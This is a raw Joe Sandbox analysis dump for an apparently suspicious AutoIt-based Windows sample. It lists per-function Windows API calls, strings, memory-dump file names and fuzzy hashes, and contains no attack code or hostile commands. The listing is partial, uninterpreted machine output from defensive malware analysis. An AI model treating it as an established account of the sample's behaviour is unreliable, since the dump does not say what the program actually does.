                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: S$0$F
                                                                            • API String ID: 176399719-740163881
                                                                            • Opcode ID: 7c344b8e6dedd9936999ad254c1b7b4875776a6ec3ab69a9975961caae0fe11e
                                                                            • Instruction ID: 4460715b8e1eefb9529657dfc603eacbd611d28f67e5f24cfb3d0c8caf4f644c
                                                                            • Opcode Fuzzy Hash: 7c344b8e6dedd9936999ad254c1b7b4875776a6ec3ab69a9975961caae0fe11e
                                                                            • Instruction Fuzzy Hash: FF411B75A01209EFDB20EFA4D988E9A7BB5FF49350F244029FA56D7361D731A910CF90
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0083E2A0,00000010,?,Bad directive syntax error,0088F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0085F7C2
                                                                            • LoadStringW.USER32(00000000,?,0083E2A0,00000010), ref: 0085F7C9
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                            • _wprintf.LIBCMT ref: 0085F7FC
                                                                            • __swprintf.LIBCMT ref: 0085F81E
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0085F88D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 1506413516-4153970271
                                                                            • Opcode ID: 905dab33da2492b83601525c464bdc1e385dde23b0cebc5f0193de0ab406055d
                                                                            • Instruction ID: 407a61576e5e077e4f8dde66baf9cd76d6d947f75c28e12ac15f72f2e2cef6b3
                                                                            • Opcode Fuzzy Hash: 905dab33da2492b83601525c464bdc1e385dde23b0cebc5f0193de0ab406055d
                                                                            • Instruction Fuzzy Hash: 0E218F3180021DFBDF11EF94CC0AEEE7739FF14304F040465F615A61A2EA35AA58DB51
                                                                            APIs
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                              • Part of subcall function 00807924: _memmove.LIBCMT ref: 008079AD
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00865330
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00865346
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00865357
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00865369
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0086537A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_memmove
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2279737902-1007645807
                                                                            • Opcode ID: 923ac226f324d384d0681385becd3e59c633247e2b6781c37e2883975aa7348d
                                                                            • Instruction ID: 2556c2a25e4feb8e9004716ec859fbfd60f3c937925e86c1c2a62d599361975f
                                                                            • Opcode Fuzzy Hash: 923ac226f324d384d0681385becd3e59c633247e2b6781c37e2883975aa7348d
                                                                            • Instruction Fuzzy Hash: 09119020E50169B9D760B665CC4ADFFBBBCFBA2F48F100429B521E23D1EEA01D05C6A5
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 208665112-3771769585
                                                                            • Opcode ID: 144b2582d98edbdb236cadd92aecff270dbe27db3cff5d8726f2fbc07425f536
                                                                            • Instruction ID: e0520fb66170b321be990544c16ad36a9c07749c246ff32b66343f5877a056c4
                                                                            • Opcode Fuzzy Hash: 144b2582d98edbdb236cadd92aecff270dbe27db3cff5d8726f2fbc07425f536
                                                                            • Instruction Fuzzy Hash: E011C071500118AFDB20BB38AC4AEEE77ACFB02711F1501B6F645D6192EF748AC18B61
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 00864F7A
                                                                              • Part of subcall function 0082049F: timeGetTime.WINMM(?,75A4B400,00810E7B), ref: 008204A3
                                                                            • Sleep.KERNEL32(0000000A), ref: 00864FA6
                                                                            • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00864FCA
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00864FEC
                                                                            • SetActiveWindow.USER32 ref: 0086500B
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00865019
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00865038
                                                                            • Sleep.KERNEL32(000000FA), ref: 00865043
                                                                            • IsWindow.USER32 ref: 0086504F
                                                                            • EndDialog.USER32(00000000), ref: 00865060
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 3e7ac9f991f92d96c3fb336b6237f70114eac64edc521fe4da08a1e8c0b9af8f
                                                                            • Instruction ID: 924ab241dd1c820d3a73b323c315edc95a44ebb998eecf373d09266aea5548d4
                                                                            • Opcode Fuzzy Hash: 3e7ac9f991f92d96c3fb336b6237f70114eac64edc521fe4da08a1e8c0b9af8f
                                                                            • Instruction Fuzzy Hash: C7219374204605AFE7119F74ED89F2A3BB9FB54745F251034F202C22B2EB719D60DB62
                                                                            APIs
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            • CoInitialize.OLE32(00000000), ref: 0086D5EA
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0086D67D
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0086D691
                                                                            • CoCreateInstance.OLE32(00892D7C,00000000,00000001,008B8C1C,?), ref: 0086D6DD
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0086D74C
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 0086D7A4
                                                                            • _memset.LIBCMT ref: 0086D7E1
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0086D81D
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0086D840
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0086D847
                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0086D87E
                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0086D880
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: c883ebc3a9a0cf533d59e1c456cf9adcd85a1f1cc67dad06e36cbd354f065a93
                                                                            • Instruction ID: 8210dad486e90245289c2c6f9de0d6301c8c65235ef5d3a84d91b38aed999ae0
                                                                            • Opcode Fuzzy Hash: c883ebc3a9a0cf533d59e1c456cf9adcd85a1f1cc67dad06e36cbd354f065a93
                                                                            • Instruction Fuzzy Hash: F5B10D75A00219AFDB04DF68C888DAEBBB9FF48314B158469E909EB251DB30ED41CB51
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 0085C283
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0085C295
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0085C2F3
                                                                            • GetDlgItem.USER32(?,00000002), ref: 0085C2FE
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0085C310
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0085C364
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0085C372
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0085C383
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0085C3C6
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0085C3D4
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0085C3F1
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0085C3FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: c89e1813c1bfa1bdc0af8569c13ab75c565f4e39c0cb5d59c9f73ab352b5da38
                                                                            • Instruction ID: 69c15b286a36db3f66afb2f535f5263cb27f2de7028f2ffe5519d15928f350fd
                                                                            • Opcode Fuzzy Hash: c89e1813c1bfa1bdc0af8569c13ab75c565f4e39c0cb5d59c9f73ab352b5da38
                                                                            • Instruction Fuzzy Hash: 6D513E71B00205AFDB18CFADDD89AAEBBB6FF98311F148129FA15D6291D7709D448B10
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,0088F910), ref: 0086A90B
                                                                            • GetDriveTypeW.KERNEL32(00000061,008B89A0,00000061), ref: 0086A9D5
                                                                            • _wcscpy.LIBCMT ref: 0086A9FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-1000479233
                                                                            • Opcode ID: 23fa3e76d15c9edfc1bea12cde5796e9f41255963a6d7eccaa11d94f1eda18c9
                                                                            • Instruction ID: d06ad1587b2dfc4f72d67c2f365ce5c4ba02bbc86c10a5196b79826976a354c1
                                                                            • Opcode Fuzzy Hash: 23fa3e76d15c9edfc1bea12cde5796e9f41255963a6d7eccaa11d94f1eda18c9
                                                                            • Instruction Fuzzy Hash: E7518D311083119FC704EF18D892AAFBBA5FF84344F55482DF5A6E72A2DB319949CA53
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008886FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID: S
                                                                            • API String ID: 634782764-2858979982
                                                                            • Opcode ID: e0d9ebded6a4233aa43535f9df3946ad775dff4958429819212a03a3cc77266e
                                                                            • Instruction ID: 8ed1ed3863df94eefa7d74fbe641981a6d5f7517664a8510428e42c3a8f7f065
                                                                            • Opcode Fuzzy Hash: e0d9ebded6a4233aa43535f9df3946ad775dff4958429819212a03a3cc77266e
                                                                            • Instruction Fuzzy Hash: EA518170500245FEEF20FB288C89FA97BA5FB15724FA04225FA51E61E1DFB1A980CB51
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __i64tow__itow__swprintf
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 421087845-2263619337
                                                                            • Opcode ID: e186dc3d2aecc3b9a5d154d55cb0ce232c774c460c516ff34b406347dd8b10da
                                                                            • Instruction ID: 2d3cb70a62d1b56c893845242136405ad45504da493a7bb4b2eef34211b142e4
                                                                            • Opcode Fuzzy Hash: e186dc3d2aecc3b9a5d154d55cb0ce232c774c460c516ff34b406347dd8b10da
                                                                            • Instruction Fuzzy Hash: 4841B271904209AFDB24AF38DC46A7A73E8FF45304F20447EE589D6393EA35A941CB91
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0088755E
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00887565
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00887578
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00887580
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0088758B
                                                                            • DeleteDC.GDI32(00000000), ref: 00887594
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0088759E
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008875B2
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008875BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: 7a9b0b18de13a91b3a7bf2bee21a4c239ace71e2fb9d60404c5b16b223f64148
                                                                            • Instruction ID: 8b90590a892c37161ad562225a503597ed64d48c26d416b7365ea69b73587477
                                                                            • Opcode Fuzzy Hash: 7a9b0b18de13a91b3a7bf2bee21a4c239ace71e2fb9d60404c5b16b223f64148
                                                                            • Instruction Fuzzy Hash: 10316A32104215ABDF12AF68DC09FEA3B79FF49320F210224FA15E61A1D731D821DBA4
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00826E3E
                                                                              • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                                            • __gmtime64_s.LIBCMT ref: 00826ED7
                                                                            • __gmtime64_s.LIBCMT ref: 00826F0D
                                                                            • __gmtime64_s.LIBCMT ref: 00826F2A
                                                                            • __allrem.LIBCMT ref: 00826F80
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00826F9C
                                                                            • __allrem.LIBCMT ref: 00826FB3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00826FD1
                                                                            • __allrem.LIBCMT ref: 00826FE8
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00827006
                                                                            • __invoke_watson.LIBCMT ref: 00827077
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                            • String ID:
                                                                            • API String ID: 384356119-0
                                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                            • Instruction ID: cfe2db2517d69aa1237f82bcd127610e5447ee2290bf33b97d6eef37930c4d6b
                                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                            • Instruction Fuzzy Hash: 6571E476A00B26ABDB14AE7DEC41B5AB3A8FF44324F14422AF514D7281F770EA9487D1
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00862542
                                                                            • GetMenuItemInfoW.USER32(008C5890,000000FF,00000000,00000030), ref: 008625A3
                                                                            • SetMenuItemInfoW.USER32(008C5890,00000004,00000000,00000030), ref: 008625D9
                                                                            • Sleep.KERNEL32(000001F4), ref: 008625EB
                                                                            • GetMenuItemCount.USER32(?), ref: 0086262F
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 0086264B
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00862675
                                                                            • GetMenuItemID.USER32(?,?), ref: 008626BA
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00862700
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862714
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862735
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                            • String ID:
                                                                            • API String ID: 4176008265-0
                                                                            • Opcode ID: 07b193f05f5846ff54f20494d4f7881996dd4a7ba184b50283de3cfa88adc4e5
                                                                            • Instruction ID: 5f77916c4306bb96d290a1adb4692ca7c0b16e3ec28088f1cf32cb53b6a552b0
                                                                            • Opcode Fuzzy Hash: 07b193f05f5846ff54f20494d4f7881996dd4a7ba184b50283de3cfa88adc4e5
                                                                            • Instruction Fuzzy Hash: 1F61B2B0900A49AFDF21DFA8DC88DBE7BB9FB01348F1541A9E942E7251D731AD05DB21
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00856BBF
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00856C18
                                                                            • VariantInit.OLEAUT32(?), ref: 00856C2A
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00856C4A
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00856C9D
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00856CB1
                                                                            • VariantClear.OLEAUT32(?), ref: 00856CC6
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00856CD3
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00856CDC
                                                                            • VariantClear.OLEAUT32(?), ref: 00856CEE
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00856CF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: 92a8d98c32f66243b0dc7bfcb78b0430f8cc4630672b7a94796ccbd8cfd43e89
                                                                            • Instruction ID: 2b04cb8110c6923de0cd8f13b8e394a532634b6bed7f849e9b395470b9e3a055
                                                                            • Opcode Fuzzy Hash: 92a8d98c32f66243b0dc7bfcb78b0430f8cc4630672b7a94796ccbd8cfd43e89
                                                                            • Instruction Fuzzy Hash: D6415E71A002199FCF00DFA8D8449AEBBB9FF08355F408069ED55E7262DB30AD59CB95
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0088D47C
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0088D49C
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0088D6D7
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0088D6F5
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0088D716
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 0088D735
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0088D75A
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0088D77D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
